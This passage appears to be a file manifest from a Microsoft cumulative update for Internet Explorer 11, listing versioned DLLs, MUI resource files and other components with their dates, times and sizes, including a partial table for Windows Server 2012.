\nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:59| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:58| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 4,147,712 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 19:43| 39,936 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18698| 14-May-2017| 12:41| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 0:14| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:22| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:21| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:23| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:24| 75,776 \nieui.dll| 11.0.9600.19650| 11-Feb-2020| 4:46| 427,520 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 17:52| 292,864 \ninstall.ins| Not versioned| 12-Feb-2021| 16:24| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:35| 548,864 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 107,008 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 19:34| 23,552 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:02| 62,464 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.17416| 30-Oct-2014| 19:52| 495,616 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 726,016 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 39,936 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 364,032 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 17:58| 221,696 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:50| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:20| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:17| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:06| 175,616 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 17:44| 10,948,608 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:05| 263,680 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,186,304 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 587,264 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:51| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:43| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:34| 43,520 \nmsfeedssync.exe| 11.0.9600.16384| 21-Aug-2013| 20:05| 11,776 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 73,216 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 17:44| 16,229,376 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 1:36| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:39| 3,228 \nIEAdvpack.dll| 11.0.9600.16384| 21-Aug-2013| 19:54| 98,816 \nieetwcollector.exe| 11.0.9600.18658| 5-Apr-2017| 10:29| 98,816 \nieetwproxystub.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 43,008 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 1:36| 4,096 \nielowutil.exe| 11.0.9600.17031| 22-Feb-2014| 1:32| 222,208 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 308,224 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:11| 268,800 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 34,816 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.16518| 6-Feb-2014| 1:12| 112,128 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 12-Feb-2021| 18:53| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 457,216 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:01| 574,976 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 1,935,360 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:22| 60,928 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 1,105,408 \noccache.dll| 11.0.9600.19867| 12-Oct-2020| 21:01| 121,856 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \nwebcheck.dll| 11.0.9600.19867| 12-Oct-2020| 20:57| 201,216 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:46| 65 \npdm.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 420,752 \nmsdbg2.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 295,320 \npdmproxy100.dll| 12.0.20712.1| 26-Jul-2013| 10:03| 76,712 \nmsrating.dll| 11.0.9600.17905| 15-Jun-2015| 12:46| 157,184 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,186,240 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 17:52| 678,400 \niernonce.dll| 11.0.9600.16518| 6-Feb-2014| 1:15| 28,160 \niesetup.dll| 11.0.9600.16518| 6-Feb-2014| 1:23| 59,904 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:46| 16,303 \ninseng.dll| 11.0.9600.16384| 21-Aug-2013| 19:35| 77,312 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:28| 87,552 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:02| 155,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 130,048 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:09| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:00| 734,720 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 19:49| 236,032 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:03| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:54| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:53| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:31| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:52| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:48| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:49| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:51| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:50| 1,890,304 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 17:34| 12,315,648 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:38| 24,486 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:34| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 18:45| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:32| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:31| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:30| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 19:33| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:24| 1,678,023 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 17:54| 675,328 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 20:15| 84,480 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 17:43| 3,573,248 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 557,568 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:12| 516,608 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:17| 403,968 \n \n### **Windows Server 2012**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19963| 1,343,488| 13-Feb-21| 1:50 \nIexplore.exe| 11.0.9600.19963| 810,400| 14-Feb-21| 0:24 \nWininet.dll.mui| 11.0.9600.19963| 46,592| 14-Feb-21| 0:26 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:27 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:28 \nWininet.dll.mui| 11.0.9600.19963| 56,320| 14-Feb-21| 0:29 \nWininet.dll.mui| 11.0.9600.19963| 57,856| 14-Feb-21| 0:30 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:31 \nWininet.dll.mui| 11.0.9600.19963| 47,616| 14-Feb-21| 0:32 \nWininet.dll.mui| 11.0.9600.19963| 49,152| 14-Feb-21| 0:32 \nWininet.dll.mui| 11.0.9600.19963| 55,296| 14-Feb-21| 0:33 \nWininet.dll.mui| 11.0.9600.19963| 45,056| 14-Feb-21| 0:34 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:35 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:36 \nWininet.dll.mui| 11.0.9600.19963| 39,424| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 35,840| 14-Feb-21| 0:38 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:39 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:40 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:41 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 53,760| 14-Feb-21| 0:42 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:44 \nWininet.dll.mui| 11.0.9600.19963| 54,272| 14-Feb-21| 0:44 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:45 \nWininet.dll.mui| 11.0.9600.19963| 51,200| 14-Feb-21| 0:46 \nWininet.dll.mui| 11.0.9600.19963| 53,248| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 52,736| 14-Feb-21| 0:47 \nWininet.dll.mui| 11.0.9600.19963| 51,712| 14-Feb-21| 0:48 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:49 \nWininet.dll.mui| 11.0.9600.19963| 50,688| 14-Feb-21| 0:50 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:51 \nWininet.dll.mui| 11.0.9600.19963| 50,176| 14-Feb-21| 0:51 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:52 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:53 \nWininet.dll.mui| 11.0.9600.19963| 30,720| 14-Feb-21| 0:54 \nInetcpl.cpl| 11.0.9600.19963| 2,058,752| 13-Feb-21| 2:12 \nMshtml.dll.mui| 11.0.9600.19963| 307,200| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 293,888| 14-Feb-21| 0:26 \nMshtml.dll.mui| 11.0.9600.19963| 290,304| 14-Feb-21| 0:27 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:28 \nMshtml.dll.mui| 11.0.9600.19963| 299,008| 14-Feb-21| 0:29 \nMshtml.dll.mui| 11.0.9600.19963| 303,104| 14-Feb-21| 0:30 \nMshtml.dll.mui| 11.0.9600.19963| 282,112| 14-Feb-21| 2:00 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 0:31 \nMshtml.dll.mui| 11.0.9600.19963| 283,648| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 291,840| 14-Feb-21| 0:32 \nMshtml.dll.mui| 11.0.9600.19963| 299,520| 14-Feb-21| 0:33 \nMshtml.dll.mui| 11.0.9600.19963| 275,968| 14-Feb-21| 0:34 \nMshtml.dll.mui| 11.0.9600.19963| 290,816| 14-Feb-21| 0:35 \nMshtml.dll.mui| 11.0.9600.19963| 293,376| 14-Feb-21| 0:36 \nMshtml.dll.mui| 11.0.9600.19963| 296,960| 14-Feb-21| 0:37 \nMshtml.dll.mui| 11.0.9600.19963| 258,048| 14-Feb-21| 0:38 \nMshtml.dll.mui| 11.0.9600.19963| 256,512| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 289,280| 14-Feb-21| 0:39 \nMshtml.dll.mui| 11.0.9600.19963| 288,256| 14-Feb-21| 0:40 \nMshtml.dll.mui| 11.0.9600.19963| 285,184| 14-Feb-21| 0:41 \nMshtml.dll.mui| 11.0.9600.19963| 295,424| 14-Feb-21| 0:42 \nMshtml.dll.mui| 11.0.9600.19963| 297,472| 14-Feb-21| 0:43 \nMshtml.dll.mui| 11.0.9600.19963| 292,864| 14-Feb-21| 